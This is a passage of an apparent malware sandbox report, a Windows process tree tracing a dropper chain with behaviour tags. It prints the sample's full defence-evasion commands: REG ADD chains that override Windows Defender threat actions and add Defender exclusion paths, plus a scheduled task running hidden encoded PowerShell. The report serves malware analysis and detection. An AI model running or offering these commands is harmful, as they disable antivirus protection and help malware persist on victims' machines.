                                                                  3⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1592
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_1.exe
                                                                    sotema_1.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3240
                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                                      5⤵
                                                                      • Loads dropped DLL
                                                                      PID:3940
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 604
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:4944
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3940 -ip 3940
                                                              1⤵
                                                                PID:852
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2504 -ip 2504
                                                                1⤵
                                                                  PID:3672
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4452 -ip 4452
                                                                  1⤵
                                                                    PID:692
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4344 -ip 4344
                                                                    1⤵
                                                                      PID:2856
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4344 -ip 4344
                                                                      1⤵
                                                                        PID:3096
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4452 -ip 4452
                                                                        1⤵
                                                                          PID:3552
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                          1⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:1284
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4452 -ip 4452
                                                                          1⤵
                                                                            PID:228
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4452 -ip 4452
                                                                            1⤵
                                                                              PID:4888
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4452 -ip 4452
                                                                              1⤵
                                                                                PID:4980
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4452 -ip 4452
                                                                                1⤵
                                                                                  PID:1196
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                  1⤵
                                                                                    PID:448
                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                      2⤵
                                                                                        PID:3112
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4452 -ip 4452
                                                                                      1⤵
                                                                                        PID:3156
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4452 -ip 4452
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4268
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -pss -s 492 -p 5012 -ip 5012
                                                                                        1⤵
                                                                                          PID:4140
                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                          C:\Windows\system32\WerFault.exe -pss -s 408 -p 2060 -ip 2060
                                                                                          1⤵
                                                                                            PID:4064
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -pss -s 432 -p 64 -ip 64
                                                                                            1⤵
                                                                                              PID:1748
                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                              C:\Windows\system32\WerFault.exe -pss -s 580 -p 860 -ip 860
                                                                                              1⤵
                                                                                                PID:4428
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                1⤵
                                                                                                  PID:4672
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                  1⤵
                                                                                                    PID:1360
                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                    1⤵
                                                                                                      PID:1680
                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 180 -p 5012 -ip 5012
                                                                                                      1⤵
                                                                                                        PID:2176
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 528 -p 2060 -ip 2060
                                                                                                        1⤵
                                                                                                          PID:2320
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\PxGCxFk.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\PxGCxFk.exe j6 /site_id 525403 /S
                                                                                                          1⤵
                                                                                                            PID:2616
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                              2⤵
                                                                                                                PID:8
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3176
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:4248
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:4088
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:3296
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2504
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:3956
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:4944
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:3748
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:1868
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:1928
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4280
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4160
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:1348
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3088
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:4140
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:3660
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4864
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3180
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1972
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1184
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3448
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2224
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3240
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3024
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2264
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2396
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2320
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:852
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:880
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:520
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3608
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1416
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5012
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1472
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3380
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2032
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2988
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4320
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4404
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3160
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:220
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:856
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "gGPUETgAR" /SC once /ST 03:47:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:3420
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "gGPUETgAR"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:240
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2084
                                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
